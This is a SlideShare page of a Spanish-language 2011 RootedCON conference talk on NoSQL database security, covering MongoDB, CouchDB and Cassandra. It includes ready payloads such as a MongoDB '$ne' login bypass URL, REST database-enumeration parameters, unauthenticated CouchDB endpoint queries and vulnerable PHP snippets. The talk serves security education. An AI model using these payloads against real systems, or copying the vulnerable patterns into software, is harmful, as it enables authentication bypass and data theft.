José Ramón Palanco - NoSQL Security [RootedCON 2011]
2 recomendaciones1,422 vistas
Este documento presenta una introducción a NoSQL y sus implementaciones más populares como MongoDB, CouchDB y Cassandra. Explica los conceptos clave de NoSQL como el teorema CAP y las diferentes arquitecturas como almacén de documentos, grafos y clave-valor. Luego, describe varios vectores de ataque específicos de NoSQL como injection en JSON y vistas, explotación de listeners HTTP, bruteforce de keys y ataques de denegación de servicio. El documento provee detalles técnicos sobre cómo aprovechar estas vulnerabilidades en cada implementación.
![{"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/ HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Date: Sat, 19 Feb 2011 05:20:28 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 188
Cache-Control: must-revalidate
{"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq":
0,"compact_running":false,"disk_size":
4182,"instance_start_time":"1298092462502662","disk_format_version":5}](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-18-320.jpg)
![{"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Etag: "1-2512702fff02fe841adecde4a22c62b5"
Date: Sat, 19 Feb 2011 05:20:47 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 155
Cache-Control: must-revalidate
{"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a2
2c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999}
Connection closed by foreign host.](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-19-320.jpg)
![Explotación de listeners
✦ Al funcionar sobre $ telnet server.com 80
HTTP, se pueden Trying X.X.X.X...
utilizar proxies Connected to server.com.
caché mal Escape character is '^]'
configurados para GET /_all_dbs
acceder a ellos Host: 192.168.2.18](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-27-320.jpg)
![JSON Injection
De la misma manera que en se
escapa el SQL, cuando trabajamos
con MongoDB ó CouchDB,
debemos hacerlo igual
db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } )
db.foo.find( { $or : [ { a : 1 } , { b : 2 },
{ c : /.*/ } ] } )](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-28-320.jpg)
![Array Injection
<?
$collection->find(array(
MongoDB + PHP "username" => $_GET
['username'],
"passwd" => $_GET
✦ En PHP es posible que una variable sea un ['passwd']
array simplemente añadiendo corchetes ));
?>
✦ Si la passwd de admin Not Equal , podremos
acceder
/login.php?username=admin&passwd[$ne]=1
✦ Además de $ne, podremos injectar:
<?
✦ $or, $exists, $nin, $in, $lt, ... (lógicos) $collection->find(array(
"username" => "admin",
"passwd" => array("$ne" => 1)
✦ &var[‘$regex’]=/privileged/i (regex) ));
?>](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-29-320.jpg)
![REST INJECTION
<?
$dbname = $_GET["db"];
$doc_id = $_GET["d_id"];
$resp = $couch->send("GET", "/" . $dbname ."/" . $doc_id);
?>
✦ Cross Database:
✦ /?db=_all_dbs
✦ /?db=usuarios](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-32-320.jpg)
![Cassandra Security
<?
...
$columnParent = new cassandra_ColumnParent();
$columnParent->super_column = NULL;
if(isset($_GET[‘CF’]))
$columnParent->column_family = $_GET[‘CF’].“_myfam”;
✦ Si podemos $sliceRange = new cassandra_SliceRange();
modificar el nombre $sliceRange->start = "";
$sliceRange->finish = "";
de una familia, $predicate = new cassandra_SlicePredicate();
list() = $predicate->column_names;
podremos obtener $predicate->slice_range = $sliceRange;
$consistency_level = cassandra_ConsistencyLevel::ONE;
elementos de otra $keyUserId = 1;
familia $result = $client->get_slice($keyspace, $keyUserId,
$columnParent, $predicate, $consistency_level);
print_r($result);
...
?>](https://image.slidesharecdn.com/rooted-nosqlsecurity-110307132650-phpapp02/85/Jose-Ramon-Palanco-NoSQL-Security-RootedCON-2011-37-320.jpg)
José Ramón Palanco - NoSQL Security [RootedCON 2011]
- 1. NoSQL Security José Ramón Palanco
- 2. Agenda ✦ Introducción NoSQL ✦ NoSQL vs RDBMS ✦ Arquitectura NoSQL ✦ Implementaciones de NoSQL ✦ Vectores de ataque ✦ Injections ✦ Key Bruteforce ✦ HTTP Protocol Based Attacks en listeners ✦ Cassandra security y Thrift security ✦ Denial of Service (connection pollution, evil queries)
- 4. ¿Qué es NoSQL? ✦ Por lo general, no requieren de un esquema de la tabla fija ni utiliza join ✦ Todas las soluciones de NoSQL no implementan una o más de las propiedades ACID
- 5. Teorema de CAP ✦ Propiedades: consistencia, disponibilidad (availability) y particiones ✦ Al menos son necesarias 2 ✦ Para escalar es necesario particiones ✦ En la mayoría de los casos primará disponibilidad sobre consistencia
- 6. Arquitectura NoSQL RDBMS NoSQL Cliente Cliente Servidor HTTP Servidor HTTP SQL REST, JSON, XML, ... Connector BBDD Connector BBDD ODBC, ADO, JDBC Binario, HTTP, ...
- 7. NoSQL vs RDBMS ✦ Las RDBMS modernas muestran pobre desempeño y escalabilidad en aplicaciones que hacen un uso intensivo de los datos ✦ Cloud Computing (SaaS) ✦ Redes sociales ✦ Para consultas complejas es inviable utilizar algo diferente a RDBMS
- 8. Ejemplos de entornos ✦ En muchos entornos es necesario distribuir las escrituras en clusters, MapReduce, .. ✦ Facebook necesita almacenar 135 mil millones de mensajes cada mes ✦ Twitter almacena 7 TB diarios (duplica varias veces al año)
- 9. Desventajas NoSQL ✦ OLTP ✦ SQL ✦ Ad-Hoc queries ✦ Relaciones complejas
- 10. Arquitecturas NoSQL ✦ Almacen de documentos ✦ Grafos ✦ Clave/Valor y Tupla ✦ Multivalor ✦ Objetos ✦ Tabular
- 11. Almacén de documentos ✦ CouchDB: ✦ MongoDB ✦ Terrastore ✦ ThruDB ✦ OrientDB ✦ RavenDB
- 12. Grafos ✦ Neo4J ✦ Sones ✦ InfoGrid ✦ HypergraphDB ✦ AllegroGraph ✦ BigData
- 13. Clave/Valor y Tupla ✦ Redis ✦ Riak ✦ Tokio Cabinet ✦ MemcacheDB ✦ Membase ✦ Azure
- 14. Multivalor ✦ U2 ✦ OpenInsight ✦ OpenQM
- 15. Objetos ✦ db4o ✦ Objetivity ✦ Versant ✦ NEO
- 16. MongoDB ✦ Protocolo: Binario (BSON) ✦ API: varios lenguajes ✦ Query: JavaScript/JSON ✦ Lenguaje: C++
- 17. • Schema-Free (JSON) Features CouchDB • Document Oriented, Not Relational • Highly Concurrent ✦ Protocolo: REST • RESTful HTTP API ✦ API: JSON • JavaScript-Powered ✦ Map/Reduce Query: MapReduce (JS) ✦ • Lenguaje: Erlang N-Master Replication • Robust Storage
- 18. {"couchdb":"Welcome","version":"0.11.0"} $ telnet 172.16.163.129 5984 Trying 172.16.163.129... Connected to 172.16.163.129. Escape character is '^]'. GET /rooted/ HTTP/1.1 Host: localhost HTTP/1.1 200 OK Server: CouchDB/0.11.0 (Erlang OTP/R14B) Date: Sat, 19 Feb 2011 05:20:28 GMT Content-Type: text/plain;charset=utf-8 Content-Length: 188 Cache-Control: must-revalidate {"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq": 0,"compact_running":false,"disk_size": 4182,"instance_start_time":"1298092462502662","disk_format_version":5}
- 19. {"couchdb":"Welcome","version":"0.11.0"} $ telnet 172.16.163.129 5984 Trying 172.16.163.129... Connected to 172.16.163.129. Escape character is '^]'. GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1 Host: localhost HTTP/1.1 200 OK Server: CouchDB/0.11.0 (Erlang OTP/R14B) Etag: "1-2512702fff02fe841adecde4a22c62b5" Date: Sat, 19 Feb 2011 05:20:47 GMT Content-Type: text/plain;charset=utf-8 Content-Length: 155 Cache-Control: must-revalidate {"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a2 2c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999} Connection closed by foreign host.
- 20. Redis ✦ Protocolo: Telnet plano ✦ API: Varios lenguajes ✦ Query: Comandos ✦ Lenguaje: C/C++
- 21. Cassandra ✦ Protocolo: Binario (Thrift) ✦ API: Thrift ✦ Query: Columna/rangos ✦ Lenguaje: Java
- 22. Cassandra ✦ Columna (tuple/triplet) ✦ Supercolumna (compuesto por columnas) ✦ Familia de Columna (contiene supercolumnas) ✦ Keyspace (alberga familias de columnas)
- 23. Cassandra <Keyspace Name="BloggyAppy"> <!-- CF definitions --> <ColumnFamily CompareWith="BytesType" Name="Authors"/> <ColumnFamily CompareWith="BytesType" Name="BlogEntries"/> <ColumnFamily CompareWith="TimeUUIDType" Name="TaggedPosts"/> <ColumnFamily CompareWith="TimeUUIDType" Name="Comments" CompareSubcolumnsWith="BytesType" ColumnType="Super"/> </Keyspace> storage-conf.xml
- 25. Introducción ✦ Diversos conceptos de bases de datos ✦ Diversas implementaciones ✦ Por lo tanto los vectores de ataque son muy específicos y dependerán de cada implementación
- 26. HTTP Based Attacks ✦ ¿Quien usa HTTP? ✦ CouchDB ✦ HBASE ✦ Riak ✦ ¿Como localizar vulnerabilidades? ✦ fuzzing: hzzp
- 27. Explotación de listeners ✦ Al funcionar sobre $ telnet server.com 80 HTTP, se pueden Trying X.X.X.X... utilizar proxies Connected to server.com. caché mal Escape character is '^]' configurados para GET /_all_dbs acceder a ellos Host: 192.168.2.18
- 28. JSON Injection De la misma manera que en se escapa el SQL, cuando trabajamos con MongoDB ó CouchDB, debemos hacerlo igual db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } ) db.foo.find( { $or : [ { a : 1 } , { b : 2 }, { c : /.*/ } ] } )
- 29. Array Injection <? $collection->find(array( MongoDB + PHP "username" => $_GET ['username'], "passwd" => $_GET ✦ En PHP es posible que una variable sea un ['passwd'] array simplemente añadiendo corchetes )); ?> ✦ Si la passwd de admin Not Equal , podremos acceder /login.php?username=admin&passwd[$ne]=1 ✦ Además de $ne, podremos injectar: <? ✦ $or, $exists, $nin, $in, $lt, ... (lógicos) $collection->find(array( "username" => "admin", "passwd" => array("$ne" => 1) ✦ &var[‘$regex’]=/privileged/i (regex) )); ?>
- 30. View Injection ✦ CouchDB usa SpiderMonkey como motor de scripting ✦ Los js se cargan como views $ ldd /usr/lib/couchdb/bin/couchjs libcurl.so.4 => /usr/lib/libcurl.so.4 (0x00007f7124325000) libmozjs.so.2d => /usr/lib/libmozjs.so.2d (0x00007f7124063000) ...
- 31. View Injection ✦ Hay vistas predefinidas y temporales ✦ Para hacer MapReduce ✦ Obtener datos arbitarios, modificar valores para alterar el flujo de ejecución
- 32. REST INJECTION <? $dbname = $_GET["db"]; $doc_id = $_GET["d_id"]; $resp = $couch->send("GET", "/" . $dbname ."/" . $doc_id); ?> ✦ Cross Database: ✦ /?db=_all_dbs ✦ /?db=usuarios
- 33. CouchDB info ✦ http://172.16.163.129:5984/_config ✦ http://172.16.163.129:5984/_all_dbs ✦ http://172.16.163.129:5984/_stats ✦ http://172.16.163.129:5984/_utils
- 35. GQL Injection ✦ Se puede a llegar inyectar GQL, pero en un entorno bastante controlado ✦ No existe el operador negación “!” ✦ El set de comandos GQL es muy limitado
- 36. Key Bruteforce ✦ Al no existir esquemas, no tenemos porque averiguarlo ✦ Los id son de gran tamaño, pero no se generan de forma aleatoria: e479f720ff9a05fb2f441fef97000c87 e479f720ff9a05fb2f441fef97000b61
- 37. Cassandra Security <? ... $columnParent = new cassandra_ColumnParent(); $columnParent->super_column = NULL; if(isset($_GET[‘CF’])) $columnParent->column_family = $_GET[‘CF’].“_myfam”; ✦ Si podemos $sliceRange = new cassandra_SliceRange(); modificar el nombre $sliceRange->start = ""; $sliceRange->finish = ""; de una familia, $predicate = new cassandra_SlicePredicate(); list() = $predicate->column_names; podremos obtener $predicate->slice_range = $sliceRange; $consistency_level = cassandra_ConsistencyLevel::ONE; elementos de otra $keyUserId = 1; familia $result = $client->get_slice($keyspace, $keyUserId, $columnParent, $predicate, $consistency_level); print_r($result); ... ?>
- 38. Denial of Service ✦ Connection polution ✦ Couchdb-> implementación interface = restfull ✦ Con GQL, es posible generar DoS al crear consultas maliciosas que consuman mucha CPU y se de de baja de GAE ó que se facture por esa CPU extra ✦ q
- 39. Preguntas
- 40. Preguntas